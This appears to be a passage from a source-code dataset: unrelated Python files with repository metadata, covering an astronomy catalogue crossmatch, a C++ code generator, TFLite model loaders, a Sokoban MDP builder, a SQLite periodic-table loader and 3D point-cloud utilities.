{'attr': 'a', 'old': Undefined, 'new': 1}
{'attr': 'b', 'old': Undefined, 'new': 2}
"""
_model_controls = ()
def __init_subclass__(cls, **kwargs):
controls = []
for k, v in members(cls):
if isinstance(v, Control):
controls.append(k)
cls._model_controls = tuple(controls)
super().__init_subclass__(**kwargs)
def __new__(cls, *args, **kwargs):
self, spectator = watched(super().__new__, cls)
for name in cls._model_controls:
ctrl = getattr(self, name)
for method in ctrl.methods:
spectator.callback(method, ctrl.before, ctrl.after)
object.__setattr__(self, "_model_views", [])
object.__setattr__(self, "_inner_models", WeakValueDictionary())
return self
def _attach_child_model(self, model):
self._inner_models[id(model)] = model
for v in self._model_views:
model._attach_model_view(v)
def _remove_child_model(self, model):
try:
del self._inner_models[id(model)]
except KeyError:
pass
else:
for v in self._model_views:
model._remove_model_view(v)
def _attach_model_view(self, function):
self._model_views.append(function)
for inner in self._inner_models.values():
inner._attach_model_view(function)
def _remove_model_view(self, function):
self._model_views.remove(function)
for inner in self._inner_models.values():
inner._remove_model_view(function)
def _notify_model_views(self, events):
events = tuple(events)
for view in self._model_views:
view(self, events)
# The MIT License (MIT)
# Copyright (c) 2016 Ryan S. Morshead
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
| 32.632212 | 88 | 0.604936 | 1,666 | 13,575 | 4.80072 | 0.210084 | 0.015004 | 0.010503 | 0.005001 | 0.199425 | 0.16004 | 0.146537 | 0.098525 | 0.087022 | 0.076019 | 0 | 0.001385 | 0.308508 | 13,575 | 415 | 89 | 32.710843 | 0.850645 | 0.507993 | 0 | 0.147239 | 0 | 0 | 0.051467 | 0.004098 | 0 | 0 | 0 | 0 | 0 | 1 | 0.147239 | false | 0.006135 | 0.042945 | 0 | 0.294479 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3d75d2890f7f5972e2fbf7529699f51b48bdb8b | 1,803 | py | Python | wk2/Crossmatching with k-d trees/05_space_trees.py | lokijota/datadrivenastronomymooc | 175655e5c6450c091534299da6bce6f10a1a3627 | [
"MIT"
] | 8 | 2018-12-09T18:10:16.000Z | 2021-03-21T16:38:58.000Z | wk2/Crossmatching with k-d trees/05_space_trees.py | lokijota/datadrivenastronomymooc | 175655e5c6450c091534299da6bce6f10a1a3627 | [
"MIT"
] | null | null | null | wk2/Crossmatching with k-d trees/05_space_trees.py | lokijota/datadrivenastronomymooc | 175655e5c6450c091534299da6bce6f10a1a3627 | [
"MIT"
] | 5 | 2018-11-09T16:57:17.000Z | 2020-04-15T09:11:33.000Z | import numpy as np
import statistics
import time
from astropy.coordinates import SkyCoord
from astropy import units as u
def crossmatch(cat1, cat2, max_dist):
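# Cross-match every (RA, Dec) source in cat1 against cat2 using astropy's
# k-d-tree-backed match_to_catalog_sky; pairs farther apart than max_dist
# degrees are recorded as non-matches.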
matches = []
nomatches = []
start = time.perf_counter()
skycat1 = SkyCoord(cat1*u.degree, frame='icrs')
skycat2 = SkyCoord(cat2*u.degree, frame='icrs')
closest_ids, closest_dists, closest_dists3d = skycat1.match_to_catalog_sky(skycat2)
closest_dists_deg = closest_dists.value
for cat1idx in range(len(cat1)):
if closest_dists_deg[cat1idx] > max_dist:
nomatches.append(cat1idx)
else:
matches.append((cat1idx,closest_ids[cat1idx],closest_dists_deg[cat1idx]))
#closest_dist.value returns an array of degrees
#print("vals", closest_ids)
#print("dists", closest_dists)
#print("dists.val", closest_dists.value)
return (matches, nomatches, time.perf_counter() - start)
# You can use this to test your function.
# Any code inside this `if` statement will be ignored by the automarker.
if __name__ == '__main__':
# The example in the question
cat1 = np.array([[180, 30], [45, 10], [300, -45]])
cat2 = np.array([[180, 32], [55, 10], [302, -44]])
matches, no_matches, time_taken = crossmatch(cat1, cat2, 5)
print('matches:', matches)
print('unmatched:', no_matches)
print('time taken:', time_taken)
# A function to create a random catalogue of size n
def create_cat(n):
ras = np.random.uniform(0, 360, size=(n, 1))
decs = np.random.uniform(-90, 90, size=(n, 1))
return np.hstack((ras, decs))
# Test your function on random inputs
np.random.seed(0)
cat1 = create_cat(10)
cat2 = create_cat(20)
matches, no_matches, time_taken = crossmatch(cat1, cat2, 5)
print('matches:', matches)
print('unmatched:', no_matches)
print('time taken:', time_taken)
| 31.086207 | 85 | 0.698835 | 262 | 1,803 | 4.652672 | 0.412214 | 0.068909 | 0.044299 | 0.026251 | 0.178835 | 0.178835 | 0.178835 | 0.178835 | 0.178835 | 0.178835 | 0 | 0.046061 | 0.169163 | 1,803 | 57 | 86 | 31.631579 | 0.76769 | 0.20244 | 0 | 0.216216 | 0 | 0 | 0.051821 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054054 | false | 0 | 0.135135 | 0 | 0.243243 | 0.162162 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3d97ce2c5e214ea0d96fc151d9ce9c5473d5232 | 5,753 | py | Python | code_generator/type_generators/cpp_extended_variant.py | SumuduLansakara/JsonToStruct | 82d5ed613fc313dedeeada94679e0edbc0a5486a | [
"MIT"
] | null | null | null | code_generator/type_generators/cpp_extended_variant.py | SumuduLansakara/JsonToStruct | 82d5ed613fc313dedeeada94679e0edbc0a5486a | [
"MIT"
] | null | null | null | code_generator/type_generators/cpp_extended_variant.py | SumuduLansakara/JsonToStruct | 82d5ed613fc313dedeeada94679e0edbc0a5486a | [
"MIT"
] | null | null | null | from typing import Set
from code_generator.line_buffer import LineBuffer, IndentedBlock
from code_generator.type_generators.cpp_array_alias import CppArrayAlias
from code_generator.type_generators.cpp_enum import CppEnum
from code_generator.type_generators.cpp_extended_variant_utils.from_json_generator import FromJsonWriter
from code_generator.type_generators.cpp_extended_variant_utils.to_json_generator import ToJsonWriter
from code_generator.type_generators.cpp_simple_alias import CppSimpleAlias
from code_generator.type_generators.cpp_type_base import CppTypeBase
from schema_parser.type_defs.array_alias import ArrayAlias
from schema_parser.type_defs.extended_variant import ExtendedVariant
from schema_parser.type_defs.ref_type import RefType
from schema_parser.type_defs.simple_alias import SimpleAlias
from schema_parser.type_defs.struct_type import StructType
from schema_parser.type_registry import TypeRegistry
class CppExtendedVariant(CppTypeBase):
type_def: ExtendedVariant
base_classes: Set[str]
member_methods: Set[str]
header_includes: Set[str]
cpp_includes: Set[str]
def __init__(self, type_def: ExtendedVariant):
super().__init__(type_def)
self.type_def = type_def
self.base_classes = set()
self.member_methods = set()
self.header_includes = {'variant'}
self.cpp_includes = {'nlohmann/json.hpp'}
def add_base_class(self, class_name):
self.base_classes.add(class_name)
def add_member_method(self, method_declaration):
self.member_methods.add(method_declaration)
def write_header(self, buffer: LineBuffer, type_registry: TypeRegistry) -> None:
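# Emits roughly (a sketch of the generated header):
#   struct <Name> : std::variant<std::monostate, T1, T2, ...>[, bases...] {
#       <an embedded Type enum discriminating the member types>
#       templated SetAs/GetAs helpers plus any registered member methods
#   };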
# generate extended struct
if self.type_def.namespaces:
buffer.append('namespace ' + '::'.join(self.type_def.namespaces))
buffer.append('{')
buffer.indent_up()
if self.base_classes:
suffix = ', ' + ', '.join(self.base_classes)
else:
suffix = ''
variant_members = ['std::monostate']
for member_type_def in self.type_def.content_variant.member_type_defs:
if isinstance(member_type_def, SimpleAlias):
cpp_alias = CppSimpleAlias(member_type_def)
variant_members.append(cpp_alias.actual_type())
elif isinstance(member_type_def, ArrayAlias):
cpp_array = CppArrayAlias(member_type_def)
variant_members.append(cpp_array.actual_type(type_registry))
elif isinstance(member_type_def, StructType):
# cpp_struct = CppStruct(member_type_def)
# variant_members.append(cpp_struct.type_def.type_name)
pass
elif isinstance(member_type_def, RefType):
# target_type = type_registry.get_ref_target(member_type_def.target_uri)
# variant_members.append(target_type.type_name)
pass
else:
raise TypeError(f"Unsupported struct member type: [{member_type_def}]")
buffer.append(f"struct {self.type_def.type_name}{suffix} : std::variant<{','.join(variant_members)}>")
buffer.append("{")
with IndentedBlock(buffer):
# write type enum
cpp_enum = CppEnum(self.type_def.type_enum)
cpp_enum.type_def.type_name = cpp_enum.type_def.type_name.capitalize()
cpp_enum.write_header(buffer, type_registry)
buffer.append('')
cast_expr = f'static_cast<{self.type_def.type_enum.underlying_type}>(MemberType)'
# write setter
buffer.append('template <Type MemberType, typename T>')
buffer.append(f'void SetAs(T value) ')
buffer.extend_last('{ ')
buffer.extend_last(f'emplace<{cast_expr}>(value);')
buffer.extend_last(' }')
buffer.new_line()
# write non-const getter
buffer.append('template <Type MemberType>')
buffer.append(f'[[nodiscard]] auto& GetAs() ')
buffer.extend_last('{ ')
buffer.extend_last(f'return std::get<{cast_expr}>(*this);')
buffer.extend_last(' }')
buffer.new_line()
# write const getter
buffer.append('template <Type MemberType>')
buffer.append(f'[[nodiscard]] auto const& GetAs() const ')
buffer.extend_last('{ ')
buffer.extend_last(f'return std::get<{cast_expr}>(*this);')
buffer.extend_last(' }')
# pre-defined methods
with IndentedBlock(buffer):
if self.member_methods:
for method in self.member_methods:
buffer.append(method)
buffer.append('};')
if self.type_def.namespaces:
buffer.indent_down()
buffer.append('} // namespace ' + '::'.join(self.type_def.namespaces))
def write_source(self, buffer: LineBuffer, type_registry: TypeRegistry):
if self.type_def.namespaces:
buffer.append('namespace ' + '::'.join(self.type_def.namespaces))
buffer.append('{')
buffer.indent_up()
# internal namespace
buffer.append(f"namespace internal")
buffer.append("{")
with IndentedBlock(buffer):
fjw = FromJsonWriter(buffer, type_registry, self.type_def)
fjw.write_function()
tjw = ToJsonWriter(buffer, type_registry, self.type_def)
tjw.write_function()
buffer.append("}")
buffer.new_line()
if self.type_def.namespaces:
buffer.indent_down()
buffer.append('} // namespace ' + '::'.join(self.type_def.namespaces))
| 42.301471 | 110 | 0.649226 | 654 | 5,753 | 5.425076 | 0.188073 | 0.063134 | 0.049605 | 0.047351 | 0.45885 | 0.359357 | 0.267475 | 0.213078 | 0.213078 | 0.182638 | 0 | 0 | 0.250652 | 5,753 | 135 | 111 | 42.614815 | 0.823011 | 0.06275 | 0 | 0.346154 | 0 | 0 | 0.115056 | 0.042007 | 0.009615 | 0 | 0 | 0 | 0 | 1 | 0.048077 | false | 0.019231 | 0.134615 | 0 | 0.240385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3dac29fab9b30a15f3567e16ce2def62510c239 | 5,959 | py | Python | src/main/apps/mlops/utils/model_loader.py | Nouvellie/django-tflite | 1d08fdc8a2ec58886d7d2b8d40e7b3598613caca | [
"MIT"
] | 2 | 2021-08-23T21:56:07.000Z | 2022-01-20T13:52:19.000Z | src/main/apps/mlops/utils/model_loader.py | Nouvellie/django-tflite | 1d08fdc8a2ec58886d7d2b8d40e7b3598613caca | [
"MIT"
] | null | null | null | src/main/apps/mlops/utils/model_loader.py | Nouvellie/django-tflite | 1d08fdc8a2ec58886d7d2b8d40e7b3598613caca | [
"MIT"
] | null | null | null | import numpy as np
import os
from .file_loader import (
CatsvsdogsFileLoader,
FashionMnistFileLoader,
ImdbSentimentFileLoader,
StackoverflowFileLoader,
)
from .model_input import ModelInputGenerator
from .output_decoder import OutputDecoder
from .pipeline import Pipeline
from .preprocessing import pipeline_function_register
from abc import (
ABC,
abstractmethod,
)
from main.settings import (
DEBUG,
MODEL_ROOT,
)
from tensorflow import (
convert_to_tensor,
lite,
)
from tensorflow.keras.models import model_from_json
from typing import (
Generic,
TypeVar,
)
SELFCLASS = TypeVar('SELFCLASS')
class BaseModelLoader(ABC):
"""Metaclass for defining the model loader."""
def __new__(cls, model_dir: str, *args, **kwargs) -> Generic[SELFCLASS]:
return super(BaseModelLoader, cls).__new__(cls, *args, **kwargs)
def __init__(self, model_dir: str) -> None:
self.model_type = int(model_dir.split("/")[0])
self.model_dir = model_dir
self.model_preload()
self.preprocessing_load()
self.postprocessing_load()
self.model_input_load()
self.preload_file_loader()
def preprocessing_load(self) -> None:
"""Function to apply preprocessing to an array."""
preprocessing_path = os.path.join(MODEL_ROOT + f"{self.model_dir}/preprocessing.json")
self.preprocessing = Pipeline()
self.preprocessing.from_json(preprocessing_path)
def postprocessing_load(self) -> None:
"""Function to apply postprocessing to model output."""
postprocessing_path = os.path.join(MODEL_ROOT + f"{self.model_dir}/postprocessing.json")
self.postprocessing = OutputDecoder()
self.postprocessing.from_json(postprocessing_path)
def model_input_load(self) -> None:
"""Creates a generic modelinput."""
self.ModelInput = ModelInputGenerator()
def preload_file_loader(self) -> None:
"""Function to load the file as an array."""
if self.model_type == 1:
self.file_loader = FashionMnistFileLoader()
elif self.model_type == 2:
self.file_loader = ImdbSentimentFileLoader()
elif self.model_type == 3:
self.file_loader = StackoverflowFileLoader()
elif self.model_type == 4:
self.file_loader = CatsvsdogsFileLoader()
else:
raise ValueError(f"Unsupported model type: {self.model_type}")
def generate_model_input(self, model_input: any) -> list:
"""From file -> array -> preprocessing -> model input."""
model_input = self.file_loader(model_input)
model_input = self.preprocessing(model_input)
model_input = self.ModelInput.model_input_generator(model_input)
return model_input
@abstractmethod
def model_preload(self) -> None:
"""This function is used to generate the preload of the model."""
pass
@abstractmethod
def predict(self, model_input: any, confidence: bool) -> dict:
"""With this function the inference of the model is generated."""
pass
class TFLiteModelLoader(BaseModelLoader):
"""Class to generate predictions from a TFLite model."""
NUM_THREADS = 4
def model_preload(self) -> None:
tflite_name = [name for name in os.listdir(MODEL_ROOT + f"{self.model_dir}") if name.endswith(".tflite")][0]
model_path = os.path.join(MODEL_ROOT + f"{self.model_dir}/{tflite_name}")
if self.NUM_THREADS > 0:
self.interpreter = lite.Interpreter(
model_path=str(model_path), num_threads=self.NUM_THREADS)
else:
self.interpreter = lite.Interpreter(model_path=str(model_path))
self.interpreter.allocate_tensors()
self.input_details = self.interpreter.get_input_details()
self.output_details = self.interpreter.get_output_details()
# print(f"The model {self.model_dir.title()} has been successfully pre-loaded. (TFLITE)")
def predict(self, model_input: any, confidence: bool = False) -> dict:
model_input = self.generate_model_input(model_input)
if self.model_type in (1, 4):
for i, j in enumerate(model_input):
model_input_tensor = convert_to_tensor(
np.array(j), np.float32)
self.interpreter.set_tensor(
self.input_details[i]['index'], model_input_tensor)
elif self.model_type in (2, 3):
for i, j in enumerate(model_input):
self.interpreter.set_tensor(
self.input_details[i]['index'], j)
self.interpreter.invoke()
prediction = self.interpreter.get_tensor(
self.output_details[0]['index'])
result = self.postprocessing.output_decoding(
model_output=prediction, confidence=confidence)
return result
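# Example usage (a sketch; "1/fashion_mnist" is a hypothetical model_dir whose
# leading "<model_type>/" segment picks the file loader):
#   loader = TFLiteModelLoader("1/fashion_mnist")
#   result = loader.predict(uploaded_file, confidence=True)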
class HDF5JSONModelLoader(BaseModelLoader):
"""Class to generate predictions from a HDF5JSON model."""
def model_preload(self) -> None:
hdf5_path = os.path.join(MODEL_ROOT + f"{self.model_dir}/model.hdf5")
json_path = os.path.join(MODEL_ROOT + f"{self.model_dir}/model.json")
with open(json_path, "r") as jp:
self.model = model_from_json(jp.read())
self.model.load_weights(hdf5_path)
# print(f"The model {self.model_dir.title()} has been successfully pre-loaded. (HDF5-JSON)")
def predict(self, model_input: any, confidence: bool = False) -> dict:
model_input = self.generate_model_input(model_input)
prediction = self.model.predict(model_input)
result = self.postprocessing.output_decoding(
model_output=prediction, confidence=confidence)
return result
class CheckpointModelLoader(BaseModelLoader):
"""Class to generate predictions from a Checkpoint model."""
def model_preload(self) -> None:
pass
def predict(self, model_input: any, confidence: bool) -> dict:
pass
| 35.260355 | 116 | 0.664205 | 703 | 5,959 | 5.42532 | 0.197724 | 0.076036 | 0.031463 | 0.022024 | 0.375983 | 0.35763 | 0.303618 | 0.253802 | 0.253802 | 0.179339 | 0 | 0.004594 | 0.232925 | 5,959 | 168 | 117 | 35.470238 | 0.829797 | 0.119987 | 0 | 0.237705 | 0 | 0 | 0.039329 | 0.029882 | 0 | 0 | 0 | 0 | 0 | 1 | 0.122951 | false | 0.040984 | 0.098361 | 0.008197 | 0.295082 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3de0447e00cc0a2285e58663644fe3c006386e1 | 2,206 | py | Python | src/mdp/sokoban.py | pudumagico/RLASP | bce5b87404fdca60e983e4a187e734c49ac923fa | [
"MIT"
] | null | null | null | src/mdp/sokoban.py | pudumagico/RLASP | bce5b87404fdca60e983e4a187e734c49ac923fa | [
"MIT"
] | 1 | 2021-06-02T16:55:33.000Z | 2021-06-04T14:30:54.000Z | src/mdp/sokoban.py | pudumagico/RLASP | bce5b87404fdca60e983e4a187e734c49ac923fa | [
"MIT"
] | 2 | 2021-03-22T14:46:49.000Z | 2021-03-31T16:12:12.000Z | import os
from typing import Set
from . import MarkovDecisionProcedure
class Sokoban(MarkovDecisionProcedure):
def __init__(self, state_initial: Set[str], state_static: Set[str]):
# No discounting for Sokoban
discount_rate = 1.0
file_name = 'sokoban.lp'
super().__init__(state_initial, state_static, discount_rate, file_name)
class SokobanBuilder:
def __init__(self, level_name):
# All levels are stored in ./sokoban_levels/
path_to_level = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'sokoban_levels',
f'{level_name}.txt')
self.level_txt = ''
self.level_asp_initial = set()
self.level_asp_static = set()
self._level_from_textfile(path_to_level)
sample_mdp = self.build_mdp()
self.mdp_interface_file_path = sample_mdp.interface_file_path
self.mdp_problem_file_path = sample_mdp.problem_file_path
self.mdp_state_static = sample_mdp.state_static
def _level_from_textfile(self, path_to_level):
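# Standard Sokoban text notation: '#' wall, '.' goal, '$' box,
# '*' box already on a goal, '@' the player.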
legend_dynamic = {
'$' : {'box({x},{y})'},
'*' : {'box({x},{y})'},
'@' : {'sokoban({x},{y})'}
}
legend_static = {
'#' : {'block({x},{y})'},
'.' : {'dest({x},{y})'},
'*' : {'dest({x},{y})'},
}
with open(path_to_level, 'r') as level_file:
for y, line in enumerate(level_file, start=1):
self.level_txt += line
for x, char in enumerate(line, start=1):
self.level_asp_initial |= { s.format(x=x, y=y) for s
in legend_dynamic.get(char, set()) }
self.level_asp_static |= { s.format(x=x, y=y) for s
in legend_static.get(char, set()) }
self.level_asp_static |= { f'col({x1})' for x1 in range(1, x+1) }
self.level_asp_static |= { f'row({y1})' for y1 in range(1, y+1) }
def build_mdp(self):
return Sokoban(state_initial=self.level_asp_initial, state_static=self.level_asp_static)
| 33.938462 | 96 | 0.550771 | 273 | 2,206 | 4.131868 | 0.260073 | 0.095745 | 0.085106 | 0.079787 | 0.139184 | 0.090426 | 0.090426 | 0.04078 | 0.04078 | 0.04078 | 0 | 0.007979 | 0.318223 | 2,206 | 64 | 97 | 34.46875 | 0.742021 | 0.031278 | 0 | 0 | 0 | 0 | 0.067948 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.068182 | 0.022727 | 0.227273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3e045df8f99c15e93bf5205a4e184cde6cf770d | 1,014 | py | Python | create.py | haknkayaa/periodic-table | 89d6251074f448b875d7a024897c8203342aaebf | [
"MIT"
] | 1 | 2021-08-05T10:37:26.000Z | 2021-08-05T10:37:26.000Z | create.py | haknkayaa/periodic-table | 89d6251074f448b875d7a024897c8203342aaebf | [
"MIT"
] | null | null | null | create.py | haknkayaa/periodic-table | 89d6251074f448b875d7a024897c8203342aaebf | [
"MIT"
] | null | null | null | import sqlite3
conn = sqlite3.connect('elements.db')
cur = conn.cursor()
cur.execute('DROP TABLE IF EXISTS elements')
cur.execute('CREATE TABLE elements (number INTEGER, atomic_weight FLOAT, element TEXT, symbol TEXT, mp FLOAT, bp FLOAT, density FLOAT, earth_crust FLOAT, discovered INTEGER, egroup INTEGER, ionization FLOAT)')
########
try:
elementsListFile = open('list.txt', 'r')
except OSError:
print("File not found")
raise
count = 0
totalLines = elementsListFile.readlines()
for line in totalLines:
count += 1
print("Line{}: {}".format(count, line.strip()))
data = line.split('\t')
for i in range(0, len(data), 12):
cur.execute('INSERT INTO elements (number, atomic_weight, element, symbol, mp, bp, density, earth_crust, discovered, egroup, ionization) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)', (data[i], data[i+1], data[i+2], data[i+3], data[i+4], data[i+5],data[i+6] ,data[i+7], data[i+8], data[i+9], data[i+10]))
#endfor
#endfor
conn.commit()
| 30.727273 | 308 | 0.649901 | 146 | 1,014 | 4.486301 | 0.493151 | 0.083969 | 0.033588 | 0.036641 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021127 | 0.159763 | 1,014 | 32 | 309 | 31.6875 | 0.747653 | 0.011834 | 0 | 0 | 0 | 0.105263 | 0.445565 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052632 | 0 | 0.052632 | 0.105263 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b3e0a169cb3b631c48d93e3f6d0c870c92bbcab5 | 12,454 | py | Python | DRACO/visualization-scripts/compute_map.py | RahulSajnani/DRACO-Weakly-Supervised-Dense-Reconstruction-And-Canonicalization-of-Objects | d697905da990487589f88068c886a32d2ef57118 | [
"MIT"
] | 3 | 2021-06-20T17:46:32.000Z | 2021-12-17T16:55:00.000Z | DRACO/visualization-scripts/compute_map.py | RahulSajnani/DRACO-Weakly-Supervised-Dense-Reconstruction-And-Canonicalization-of-Objects | d697905da990487589f88068c886a32d2ef57118 | [
"MIT"
] | 1 | 2022-01-13T01:41:00.000Z | 2022-01-13T06:54:29.000Z | DRACO/visualization-scripts/compute_map.py | RahulSajnani/DRACO-Weakly-Supervised-Dense-Reconstruction-And-Canonicalization-of-Objects | d697905da990487589f88068c886a32d2ef57118 | [
"MIT"
] | 1 | 2021-09-14T06:17:55.000Z | 2021-09-14T06:17:55.000Z | import open3d as o3d
from open3d import *
import numpy as np
import sys, os
import matplotlib.pyplot as plt
import cv2
import torch
import glob
import copy
import mathutils
from PIL import Image
from pytorch3d.loss import chamfer_distance
from tk3dv.nocstools.aligning import estimateSimilarityUmeyama
import math
from tqdm import tqdm
from colorama import Fore, Back, Style
from matplotlib.gridspec import GridSpec
import json
sys.path.append('../')
sys.path.append(os.path.abspath(os.path.join('../models')))
sys.path.append(os.path.abspath(os.path.join('../Data_Loaders')))
sys.path.append(os.path.abspath(os.path.join('../Loss_Functions')))
from aadil_test import *
def quat2mat(x,y,z,w):
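# Normalize the quaternion (x, y, z, w), then expand it into the standard
# 3x3 rotation matrix; inputs are torch scalars, hence the .pow() calls.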
B = 0
w2, x2, y2, z2 = w.pow(2), x.pow(2), y.pow(2), z.pow(2)
n = w2 + x2 + y2 + z2
x = x / n
y = y / n
z = z / n
w = w / n
w2, x2, y2, z2 = w.pow(2), x.pow(2), y.pow(2), z.pow(2)
wx, wy, wz = w*x, w*y, w*z
xy, xz, yz = x*y, x*z, y*z
rotMat = torch.tensor([1 - 2*y2 - 2*z2, 2*xy - 2*wz, 2*wy + 2*xz,
2*wz + 2*xy, 1 - 2*x2 - 2*z2, 2*yz - 2*wx,
2*xz - 2*wy, 2*wx + 2*yz, 1 - 2*x2 - 2*y2]).reshape( 3, 3)
return rotMat
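def _example_quat2mat_identity():
    # A minimal sanity check for quat2mat, assuming torch scalar tensors as
    # inputs: the identity quaternion maps to the identity rotation.
    q = torch.tensor([0.0, 0.0, 0.0, 1.0])
    R = quat2mat(q[0], q[1], q[2], q[3])
    assert torch.allclose(R, torch.eye(3))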
def read_json_file(path):
'''
Read json file
'''
with open(path) as fp:
json_data = json.load(fp)
return json_data
def pose_2_matrix(pose):
'''
Function to convert pose to transformation matrix
'''
flip_x = torch.eye(4)
flip_x[2, 2] *= -1
flip_x[1, 1] *= -1
views = pose.size(0)
    # NOTE: `inv_changed` is not defined in this file; it is assumed to be
    # provided by the star import above and to offer a batched quat2mat.
    rot_mat = inv_changed.quat2mat(pose[:, 3:])  # num_views x 3 x 3
translation_mat = pose[:, :3].unsqueeze(-1) # num_views 3 1
transformation_mat = torch.cat([rot_mat, translation_mat], dim = 2)
transformation_mat = torch.cat([transformation_mat, torch.tensor([[0,0,0,1]]).unsqueeze(0).expand(1,1,4).type_as(transformation_mat).repeat(views, 1, 1)], dim=1)
flip_x = flip_x.inverse().type_as(transformation_mat)
# 180 degree rotation around x axis due to blender's coordinate system
return transformation_mat #@ flip_x
def pose_dict_to_numpy(pose):
'''
Convert pose dictionary to numpy array
'''
pose = np.array([pose['position']['x'],
pose['position']['y'],
pose['position']['z'],
pose['rotation']['x'],
pose['rotation']['y'],
pose['rotation']['z'],
pose['rotation']['w']
])
return pose
def draw_registration_result(source, target, transformation):
source_temp = copy.deepcopy(source)
target_temp = copy.deepcopy(target)
source_temp.paint_uniform_color([1, 0.706, 0])
target_temp.paint_uniform_color([0, 0.651, 0.929])
source_temp.transform(transformation)
points = [
[0, 0, 0],
[1, 0, 0],
[0, 1, 0],
[1, 1, 0],
[0, 0, 1],
[1, 0, 1],
[0, 1, 1],
[1, 1, 1],
]
lines = [
[0, 1],
[0, 2],
[1, 3],
[2, 3],
[4, 5],
[4, 6],
[5, 7],
[6, 7],
[0, 4],
[1, 5],
[2, 6],
[3, 7],
]
colors = [[1, 0, 0] for i in range(len(lines))]
line_set = o3d.geometry.LineSet(
points=o3d.utility.Vector3dVector(points),
lines=o3d.utility.Vector2iVector(lines),
)
o3d.visualization.draw_geometries([source_temp, target_temp])
def display_image(image):
cv2.imshow("image", image)
cv2.waitKey(0)
cv2.destroyAllWindows()
def photometric_error(gt, pred):
mask = generate_mask_NOCS(gt)
difference = (gt - pred)
difference[:,:,0] *= mask
difference[:,:,1] *= mask
difference[:,:,2] *= mask
difference_squared = np.square(difference)
difference_root = np.sqrt(difference_squared)
return np.mean(difference_root)
def generate_mask_NOCS(nocs_map):
'''
Function to extract mask from NOCS map
'''
    # background pixels are (near-)white; compare each pixel against white
    white = np.array([1.0, 1.0, 1.0])
image_mask = np.abs(nocs_map[:,:,:3] - white).mean(axis=2) > 0.15
return image_mask
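def _example_generate_mask_NOCS():
    # A minimal sketch of the mask above: with values in [0, 1] (as produced
    # by read_image below), a white background pixel is dropped and a colored
    # object pixel is kept.
    toy = np.ones((2, 2, 3))       # all-white background
    toy[0, 0] = [0.2, 0.5, 0.8]    # one object pixel
    mask = generate_mask_NOCS(toy)
    assert mask[0, 0] and not mask[1, 1]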
def read_image(nocs_image_path):
'''
Reading NOCS image
'''
nocs_map = cv2.imread(nocs_image_path)
nocs_map = cv2.cvtColor(nocs_map, cv2.COLOR_BGR2RGB) / 255.0
# print(nocs_map.shape)
return nocs_map
def visualize_nocs_map(nocs_map, nm, mask=None, image = None):
'''
Plots 3D point cloud from nocs map
Arguments:
nocs_map - [H x W x 3] - NOCS map for image
Returns:
None
'''
h, w = nocs_map.shape[:2]
    nocs_mask = mask  # alternatively: generate_mask_NOCS(nm)
# print(np.unique(nocs_mask))
# display_image(nocs_mask / 255.0)
# plt.imshow(nocs_mask)
# plt.show()
nocs_mask_cloud = np.reshape(nocs_mask, (h*w))
# print(nocs_mask_cloud.shape)
nocs_cloud = np.reshape(nocs_map, (h*w, 3))
# nocs_cloud = np.reshape(nocs_map, (3, h*w))
nocs_cloud = nocs_cloud[nocs_mask_cloud == 1.0, :]
colors = nocs_cloud
if image is not None:
image_cloud = np.reshape(image, (h*w, 3))
